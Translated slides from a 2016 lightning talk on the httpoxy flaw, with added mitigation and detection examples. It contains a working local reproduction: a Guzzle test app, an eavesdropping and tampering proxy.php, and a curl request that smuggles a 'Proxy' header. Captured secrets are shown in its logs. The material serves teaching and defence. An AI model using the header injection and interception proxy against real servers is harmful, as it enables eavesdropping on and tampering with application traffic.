
A beginner-friendly talk about httpoxy and vulnerabilities in general, at #PHPBLT 5

uzulla
July 20, 2016


Slides for a lightning talk at PHPBLT #5 that I mostly did not get to present.



Transcript

  1. PHPBLT#5
    Httpoxy and other things
    20160720
    uzulla

  2. About me
    • Junichi Ishida aka uzulla
    • A small-time freeter (er, freelancer)
    • Hachioji-something-or-other
    • And that "something Hachioji in Shinagawa" thing

  3. Httpoxy
    • https://httpoxy.org/
    • By sending a crafted request, an attacker may be able to set an HTTP proxy for the requests PHP makes out to other servers
    • So they may be able to eavesdrop on the app's HTTP traffic to other servers
    • Or tamper with it
    • Everyone has already checked their own code, right?!
    • (If everyone already knows this, I'll skip a few pages)

  4. (image-only slide, no text)

  5. • The cause is a collision between a common CLI convention and the CGI spec
    • Many CLI programs let you configure a proxy via the HTTP_PROXY environment variable
    • That is (almost) useless in a web app, but normal people(?) also write CLI programs in PHP, so some libraries added support for it
    • Meanwhile, the CGI spec stores a request header named (for example) HOGE in the environment variable HTTP_HOGE...
    • So when a "Proxy" request header arrives, the environment variable HTTP_PROXY gets set, and a request header ends up choosing the proxy (!)
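To make the collision on this slide concrete, here is an added example (not code from the deck, from Guzzle, or from the httpoxy PoC) that applies the RFC 3875 name mapping to a constructed request and then shows a proxy lookup in the pre-fix style beside a hardened one. The hardened variant ignores HTTP_PROXY unless the SAPI is the command line, which is the approach Guzzle 6.2.1 took; the request headers, the `fpm-fcgi` SAPI name and the corporate proxy value are all constructed for the illustration.

```php
<?php
// Added example: the RFC 3875 header-to-environment mapping, and why a client
// that trusts HTTP_PROXY under a web SAPI can be steered by a request header.
declare(strict_types=1);

/**
 * RFC 3875 section 4.1.18: the header name is upper-cased, "-" becomes "_",
 * and "HTTP_" is prepended. (Content-Type and Content-Length additionally get
 * their own CONTENT_TYPE / CONTENT_LENGTH variables; servers differ on whether
 * they also emit the HTTP_ form, so that detail is left out here.)
 */
function cgiMetaVariable(string $headerName): string
{
    return 'HTTP_' . strtoupper(str_replace('-', '_', $headerName));
}

/** Build the environment a CGI/FastCGI server hands to PHP for one request. */
function cgiEnvironment(array $requestHeaders): array
{
    $env = [];
    foreach ($requestHeaders as $name => $value) {
        $env[cgiMetaVariable($name)] = $value;
    }
    return $env;
}

/** Pre-fix behaviour: honour HTTP_PROXY wherever the code happens to run. */
function proxyForVulnerableClient(array $env): ?string
{
    return $env['HTTP_PROXY'] ?? null;
}

/**
 * Hardened: honour HTTP_PROXY only when running as a command-line program.
 * Under a web SAPI the variable may have come from an attacker's "Proxy:"
 * header, so it is ignored there. Pass php_sapi_name() in real code.
 */
function proxyForHardenedClient(array $env, string $sapiName): ?string
{
    if ($sapiName !== 'cli') {
        return null;
    }
    return $env['HTTP_PROXY'] ?? null;
}

// Constructed sample: an ordinary request plus the attacker's "Proxy:" header.
// Header names are case-insensitive, so "PROXY", "Proxy" and "proxy" all map
// to the same variable.
$attackerRequest = [
    'Host'         => 'app.example.com',
    'Content-Type' => 'application/x-www-form-urlencoded',
    'PROXY'        => 'http://127.0.0.1:8003/',
];
$webEnv = cgiEnvironment($attackerRequest);

// What a web worker would see: the attacker's header became HTTP_PROXY.
var_dump(array_keys($webEnv));
var_dump(proxyForVulnerableClient($webEnv));           // steered by the attacker
var_dump(proxyForHardenedClient($webEnv, 'fpm-fcgi')); // ignored under a web SAPI

// The legitimate CLI use case (constructed corporate proxy) keeps working.
$cliEnv = ['HTTP_PROXY' => 'http://corp-proxy.example.internal:3128'];
var_dump(proxyForHardenedClient($cliEnv, 'cli'));
```

The mapping function is the whole story: there is no way for the application to tell a `HTTP_PROXY` that came from the process environment apart from one that came from a `Proxy:` header, which is why the fix has to be either "never read it under a web SAPI" or "strip the header before PHP".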

  6. • PHP follows CGI here, so mod_php and FastCGI (php-fpm) behave the same way
    • Note that PHP itself is not directly affected by this vulnerability
    • Everyone's favourite file_get_contents is not affected
    • You are not affected unless you went out of your way to build it in > so why the fuss?
    • The prominent library that honours HTTP_PROXY is Guzzle
    • Fixed in 6.2.1
    • Guzzle gets pulled in as a dependency all over the place these days, which is why this became such a big topic!

  7. However...
    • What can be set is the HTTP_PROXY environment variable; HTTPS_PROXY cannot be set
    • Because of how the trick works, only HTTP_* variables can be set
    • So what can be hijacked is plain HTTP
    • (assuming a library with common sense!)
    • Most of the really sensitive stuff goes over HTTPS... probably...

  8. The mitigations, then
    • ✅ Drop the header at the web server (or similar) before it reaches PHP
    • ✅ Get rid of code like getenv('HTTP_PROXY')
    • Fix the code
    • Upgrade the library
    • ❌ "Can't we just overwrite the environment variable at the top of the code?" "Unfortunately, that doesn't work"
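The first mitigation on this slide, dropping the header before PHP sees it, looks like this for an nginx + PHP-FPM deployment. This is an added configuration example based on the mitigations published at httpoxy.org, not configuration from the deck; where exactly it goes (your `fastcgi_params` include or the PHP `location` block) depends on your setup.

```nginx
# nginx: neutralise the variable before it reaches PHP-FPM.
# Place this alongside your other fastcgi_param lines (e.g. in fastcgi_params
# or inside the location block that handles .php).
fastcgi_param HTTP_PROXY "";

# If nginx also reverse-proxies to backends that may run CGI-style apps,
# strip the header on that path as well.
proxy_set_header Proxy "";
```

For Apache with mod_headers the equivalent one-liner is `RequestHeader unset Proxy early`. After reloading, re-run the `curl ... -H 'PROXY: http://127.0.0.1:8003/'` test from later in this deck: the malicious proxy's error_log should stay empty.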

  9. Everyone knows all of this already
    • (surely every slide up to here got skipped)
    • By the way, do you all deal with vulnerabilities as a matter of routine?
    • Do you investigate and respond "yourself"?
    • Do you gather information "yourself", day to day?
    • (freelancers are lonely, so of course it's self-service...)

  10. Do you try them out?
    • Or do you just copy-paste the mitigation without trying it?
    • If you don't try a vulnerability out, it is easy to misunderstand it
    • Usually you have to implement it yourself, but often a PoC has been published
    • Proof of concept (a demonstration that the idea actually works)
    • Demo code that reproduces the vulnerability
    • (the now-dated term for it: exploit code)

  11. Let's try it!
    • Skip if most people here have already tried it!

  12. • Where do you find PoCs?
    • They are not necessarily listed in the CVE entry, so you have to search
    • Some people say "don't publish them, it makes things worse!", so...
    • And never, ever run a PoC (or exploit) you don't understand!!!
    • The ones linked from a CVE are probably fine, but random exploits from the wild can be destructive or carry a backdoor
    • This time the httpoxy folks published one
    • https://github.com/httpoxy/php-fpm-httpoxy-poc

  13. // The original code looks like this
    // "guzzlehttp/guzzle": "~6.0"
    $client = new GuzzleHttp\Client();
    $client->request(
        'POST',
        'http://my-internal-microservice.example.com/',
        ['secret' => 'some-really-secret-string']
    );
    echo "Request sent\n";

  14. // It doesn't work as-is, so fix the code
    // POST the "secret" data to http://127.0.0.1:8002/api.php
    // and echo whatever comes back
    <?php
    require 'vendor/autoload.php';
    $client = new GuzzleHttp\Client();
    $res = $client->request(
        'POST',
        'http://127.0.0.1:8002/api.php?himi=tsu',
        ['form_params' => ['secret' => 'I_AM_PHPER']]
    );
    echo $res->getBody();

  15. Create the API(?!)
    // api.php
    <?php
    echo "BLT!BLT!";

  16. Start the app and the API(?!)
    $ composer install
    $ php -S 127.0.0.1:8001 index.php
    # in another shell
    $ php -S 127.0.0.1:8002 api.php

  17. Try it out
    $ curl 'http://localhost:8001/'
    BLT!BLT!
    • It is fetching the data from the API, so we're good

  18. Set up a malicious proxy
    • Not needed if you already have a proxy at home
    • Charles, for example
    • (aside: Charles is getting old, what's trendy these days?)

  19. Write a crude, malicious(ish) proxy
    <?php
    // proxy.php: a client using us as a proxy puts an absolute URL in the
    // request line, so REQUEST_URI is the full address of the real destination
    $uri = $_SERVER['REQUEST_URI'];
    $body = file_get_contents('php://input');
    $method = $_SERVER['REQUEST_METHOD'];
    // log the captured body and request metadata (this is the "eavesdropping")
    error_log($body);
    error_log(print_r($_SERVER, 1));
    require 'vendor/autoload.php';
    $client = new GuzzleHttp\Client();
    // forward the request to the real destination and relay its response
    $res = $client->request($method, $uri, ['body' => $body]);
    echo $res->getBody();

  20. About the crude proxy
    • When it works, it writes the query string and the rest to error_log
    • Then it fetches from the real destination and returns the response (it's a proxy, after all...)
    • This code is crude and dangerous, so never use it for anything but experiments!
    • "Content-Type? What's that, is it tasty?"

  21. Start the crude proxy
    $ php -S 127.0.0.1:8003 proxy.php

  22. Now actually test the vulnerability!
    $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
    BLT!BLT!

  23. • "Sorry, this doesn't work"
    • It turns out the built-in server isn't vulnerable! lol
    • So let's use my own apachehere instead (anything else works too, of course)
    • https://github.com/uzulla/apachehere
    $ apachehere -p 8001
    DocumentRoot : /xxx
    php-cgi
    open : http://127.0.0.1:8001/

    [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php

  24. Retry!
    $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
    BLT!BLT!
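The manual check on the last three slides (listen with a proxy, send one request with a `Proxy:` header, see whether the app's outbound call arrives) can be turned into a repeatable probe. The script below is an added example, not code from the deck or from the php-fpm-httpoxy-poc repository. It assumes the target application runs on the same host as the probe and makes an outbound plain-HTTP request while handling the URL you pass (as index.php does here); the default target URL is the one used in this deck. A route that makes no outbound HTTP call can never trigger the canary, so "no hit" says nothing about other routes, and HTTPS calls are not caught at all, as the earlier HTTPS_PROXY slide explains.

```php
<?php
// httpoxy_check.php (added example): a canary listener plus one probe request.
// Usage: php httpoxy_check.php http://127.0.0.1:8001/
declare(strict_types=1);

/** Listen on an OS-chosen loopback port; return [socket, port]. */
function startCanary(string $bindAddr = '127.0.0.1'): array
{
    $server = stream_socket_server("tcp://{$bindAddr}:0", $errno, $errstr);
    if ($server === false) {
        throw new RuntimeException("listen failed: {$errstr} ({$errno})");
    }
    $local = stream_socket_get_name($server, false);   // e.g. "127.0.0.1:54321"
    $port  = (int) substr($local, strrpos($local, ':') + 1);
    return [$server, $port];
}

/**
 * Accept the connection the target made "through its proxy", answer with an
 * empty 200 so nothing hangs, and return the request line. For a proxied
 * request that line carries the absolute URL of the real destination, e.g.
 * "POST http://127.0.0.1:8002/api.php?himi=tsu HTTP/1.1".
 */
function acceptAndAnswer($server): ?string
{
    $conn = @stream_socket_accept($server, 1);
    if ($conn === false) {
        return null;
    }
    stream_set_timeout($conn, 2);
    $requestLine = trim((string) fgets($conn));
    while (($line = fgets($conn)) !== false && trim($line) !== '') {
        // drain the header block; the body is not needed for detection
    }
    fwrite($conn, "HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n");
    fclose($conn);
    return $requestLine === '' ? null : $requestLine;
}

/**
 * Send the probe asynchronously (curl_multi) while watching the canary, so the
 * probe waiting on the app and the app waiting on the canary cannot deadlock.
 * Returns the captured request line, or null if nothing reached the canary.
 */
function probeHttpoxy(string $targetUrl, int $timeoutSeconds = 10): ?string
{
    [$server, $port] = startCanary();

    $ch = curl_init($targetUrl);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => $timeoutSeconds,
        // Only the header *name* matters: CGI turns "Proxy" into HTTP_PROXY.
        CURLOPT_HTTPHEADER     => ["Proxy: http://127.0.0.1:{$port}/"],
    ]);
    $mh = curl_multi_init();
    curl_multi_add_handle($mh, $ch);

    $captured = null;
    $running  = 1;
    $deadline = microtime(true) + $timeoutSeconds;
    while ($captured === null && $running > 0 && microtime(true) < $deadline) {
        curl_multi_exec($mh, $running);
        $read  = [$server];
        $write = $except = [];
        if (stream_select($read, $write, $except, 0, 200000) > 0) {
            $captured = acceptAndAnswer($server);
        }
    }

    curl_multi_remove_handle($mh, $ch);
    curl_multi_close($mh);
    fclose($server);
    return $captured;
}

$target = $argv[1] ?? 'http://127.0.0.1:8001/';
$hit = probeHttpoxy($target);
if ($hit === null) {
    echo "No outbound request reached the canary (not detectably vulnerable on this route).\n";
    exit(0);
}
echo "VULNERABLE: the app sent its outbound request to the Proxy header's address: {$hit}\n";
exit(1);
```

Run it against the apachehere-served app and it should report a hit whose request line names `http://127.0.0.1:8002/api.php?himi=tsu`; run it against the same code under `php -S` and it should report nothing, which is exactly the difference the previous slide stumbled over. The non-zero exit status on a hit makes it usable as a deployment smoke test after applying a web-server mitigation.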

  25. On success, the proxy's log shows...
    [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER
    [Wed Jul 20 02:01:43 2016] Array
    (
    [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc
    [REMOTE_ADDR] => 127.0.0.1
    [REMOTE_PORT] => 53696
    [SERVER_SOFTWARE] => PHP 7.0.3 Development Server
    [SERVER_PROTOCOL] => HTTP/1.1
    [SERVER_NAME] => 127.0.0.1
    [SERVER_PORT] => 8003
    [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu
    [REQUEST_METHOD] => POST
    [SCRIPT_NAME] => /api.php
    [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php
    [PHP_SELF] => /api.php
    [QUERY_STRING] => himi=tsu
    [HTTP_HOST] => 127.0.0.1:8002
    [HTTP_PROXY_CONNECTION] => Keep-Alive
    [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3
    [CONTENT_TYPE] => application/x-www-form-urlencoded
    [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded
    [CONTENT_LENGTH] => 17
    [HTTP_CONTENT_LENGTH] => 17
    [REQUEST_TIME_FLOAT] => 1468947703.6871
    [REQUEST_TIME] => 1468947703
    )

  26. [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER
    [Wed Jul 20 02:01:43 2016] Array
    (
    snip
    [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu
    • So, as you can see, the app's request (body, query string and destination) shows up in proxy.php's log.

  27. And if we modify the proxy...
    // proxy.php
    //echo $res->getBody();
    echo "八王子！八王子！";
    • with that change:
    $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
    八王子！八王子！
    • Tampering succeeded!

  28. So,
    • For safety, use the built-in server (no, that is the wrong conclusion)
    • Actually running or building PoCs matters; you learn a lot
    • "apachehere is so handy. Docker? Vagrant? Never heard of them!"
    • "What, my PHP version is old? Sorry!"

  29. Also, be careful!
    • Don't take patch versions lightly
    • "After upgrading Guzzle, it stopped working on GAE (true story)"
    exception:
    php_sapi_name() has been disabled for security reasons.
    It can be re-enabled by adding it to
    the google_app_engine.enable_functions ini variable
    in your applications php.ini
    • "Isn't that GAE's fault... I mean, GAE's design?" "Fair enough"

  30. So where do you hear about these?
    • Where do you all learn about them?

  31. Keep watching for issues
    • It's tedious, but it's part of the job!
    • Hear about them on Twitter and other social media
    • Subscribe to CVE feeds and the like
    • Subscribe to news sites
    • Subscribe to official release announcements

  32. Twitter and other social media
    • Very fast; about half the time this is where you first learn that something exists
    • Follow people from JS, Go, Perl, infrastructure and so on (not PHP people, lol) (personal opinion)
    • Knowledgeable people naturally talk about it and (since they understand it) usually link to the primary source

  33. Security-focused news sites
    • http://jvn.jp/report/
    • JVN, in Japanese; this alone is a fine place to start (I think)
    • There's a feed too
    • https://www.jpcert.or.jp/
    • JPCERT; they have a mailing list too!

  34. • https://nvd.nist.gov/download.cfm
    • NIST, in English; handy because there is a CVE feed
    • CVE entries can more or less be treated as primary sources (I think)
    • https://security.sensiolabs.org/database
    • Information on PHP libraries; handy because there is a feed

  35. General news sites and the like
    • With general IT news sites... it is better to skip the article itself and go straight to the linked primary source...

  36. • Various subreddits: fast, but don't trust the comments right away
    • https://www.reddit.com/r/netsec
    • https://www.reddit.com/r/sysadmin
    • https://www.reddit.com/r/PHP
    • Hacker News: fast, but things scroll off the front page quickly
    • https://news.ycombinator.com/news

  37. Official sites
    • I won't go into detail here
    • But you could at least watch the releases of the frameworks, libraries and PHP itself that you use, couldn't you??

  38. Blogs
    • Sites that compile incident write-ups, and the like
    • Security companies' blogs are good too
    • Obviously, none of them is comprehensive
    • It's fine to learn the "keyword" first and then search your way to them
    • Tastes vary, so I'll skip recommendations

  39. Branded-vulnerability sites
    • Lately vulnerabilities get catchy names; Httpoxy is one of them
    • GHOST, FREAK, POODLE, and so on
    • They work like summary pages, easy to share, often with a catchy icon; that is a good thing
    • Usually easier to understand than the CVE, and reading just these is OK for a start, but they are in English.
    • Having a brand does not mean "this one is critical!", and the reverse holds too

  40. Summary: catching the news
    • RSS and mailing lists are the handy way to keep watch; social media alone will miss things! (my opinion, but not everyone cares about PHP, lol)
    • Registering for at least JPCERT and JVN is reasonable
    • If there is a branded-vulnerability site, check it first
    • English matters ()
    • Japanese translations and explainers arrive within a night or two, so if you don't understand something, don't panic: sit tight and wait

  41. That's all folks!
    • Try vulnerabilities out yourself!
    • Actually read the news!
    • Get a proper grip on vulnerabilities!
    • Glad Httpoxy turned out not to be a very flashy vulnerability!
    // enjoy !
    $ grep -r HTTP_PROXY /your/codes/